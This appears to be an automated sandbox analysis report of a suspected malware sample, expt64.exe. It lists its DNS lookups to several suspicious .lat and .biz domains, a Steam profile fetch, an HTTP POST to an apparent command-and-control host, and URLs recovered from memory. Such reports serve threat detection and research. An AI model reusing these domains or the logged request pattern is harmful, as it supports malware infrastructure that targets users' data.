              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
              Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /j(/jContent-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=b84af25699299731d3a2833f; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35126Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveFri, 10 Jan 2025 10:36:20 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
              Source: expt64.exe, 00000000.00000003.2491031020.00000000006DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ ht[ equals www.youtube.com (Youtube)
              Source: expt64.exe, 00000000.00000003.2481180004.00000000006A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
              Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
              Source: expt64.exe, 00000000.00000003.2581042978.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2517025375.00000000006DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: om/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://play equals www.youtube.com (Youtube)
              Source: expt64.exe, 00000000.00000003.2581042978.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2517025375.00000000006DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src equals www.youtube.com (Youtube)
              Source: expt64.exe, 00000000.00000003.2491031020.00000000006DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: brendon-sharjen.biz
              Source: global trafficDNS traffic detected: DNS query: wordyfindy.lat
              Source: global trafficDNS traffic detected: DNS query: slipperyloo.lat
              Source: global trafficDNS traffic detected: DNS query: manyrestro.lat
              Source: global trafficDNS traffic detected: DNS query: shapestickyr.lat
              Source: global trafficDNS traffic detected: DNS query: talkynicer.lat
              Source: global trafficDNS traffic detected: DNS query: curverpluch.lat
              Source: global trafficDNS traffic detected: DNS query: tentabatte.lat
              Source: global trafficDNS traffic detected: DNS query: bashfulacid.lat
              Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
              Source: global trafficDNS traffic detected: DNS query: sputnik-1985.com
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com
              Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
              Source: expt64.exe, 00000000.00000003.2531266282.0000000003350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: expt64.exe, 00000000.00000003.2531266282.0000000003350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: expt64.exe, 00000000.00000003.2530528245.00000000006B0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2517025375.00000000006B0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481180004.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000002.2581824546.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.00000000006B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: expt64.exe, 00000000.00000003.2544998470.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000002.2581824546.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2530528245.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481180004.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2517025375.00000000006C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: expt64.exe, 00000000.00000003.2531266282.0000000003350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: expt64.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
              Source: expt64.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
              Source: expt64.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
              Source: expt64.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
              Source: expt64.exe, 00000000.00000003.2531266282.0000000003350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: expt64.exe, 00000000.00000003.2531266282.0000000003350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: expt64.exe, 00000000.00000003.2531266282.0000000003350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: expt64.exe, 00000000.00000003.2531266282.0000000003350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: expt64.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
              Source: expt64.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
              Source: expt64.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
              Source: expt64.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
              Source: expt64.exe, 00000000.00000003.2530528245.00000000006B0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2517025375.00000000006B0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481180004.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000002.2581824546.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.00000000006B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: expt64.exe, 00000000.00000003.2531266282.0000000003350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: expt64.exe, 00000000.00000003.2531266282.0000000003350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: expt64.exeString found in binary or memory: http://ocsp.sectigo.com0
              Source: expt64.exeString found in binary or memory: http://ocsp.sectigo.com05
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2490967946.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2490967946.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2490967946.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
              Source: expt64.exe, 00000000.00000003.2531266282.0000000003350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: expt64.exe, 00000000.00000003.2531266282.0000000003350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: expt64.exe, 00000000.00000003.2503963189.0000000003379000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2490967946.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
              Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
              Source: expt64.exe, 00000000.00000003.2503963189.0000000003379000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: expt64.exe, 00000000.00000003.2581042978.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2517025375.00000000006DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.
              Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
              Source: expt64.exe, 00000000.00000003.2503963189.0000000003379000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: expt64.exe, 00000000.00000003.2503963189.0000000003379000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
              Source: expt64.exe, 00000000.00000003.2581042978.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2517025375.00000000006DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampows
              Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=SCXpgixTDzt4&a
              Source: expt64.exe, 00000000.00000003.2490967946.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
              Source: expt64.exe, 00000000.00000003.2490967946.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
              Source: expt64.exe, 00000000.00000003.2490967946.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
              Source: expt64.exe, 00000000.00000003.2490967946.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
              Source: expt64.exe, 00000000.00000003.2490967946.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2490967946.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2490967946.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2490967946.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2490967946.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_A
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=aep8
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
              Source: expt64.exe, 00000000.00000003.2490967946.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=VsdTzPa1YF_Y&l=e
              Source: expt64.exe, 00000000.00000003.2490967946.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
              Source: expt64.exe, 00000000.00000003.2490967946.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en
              Source: expt64.exe, 00000000.00000003.2490967946.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
              Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
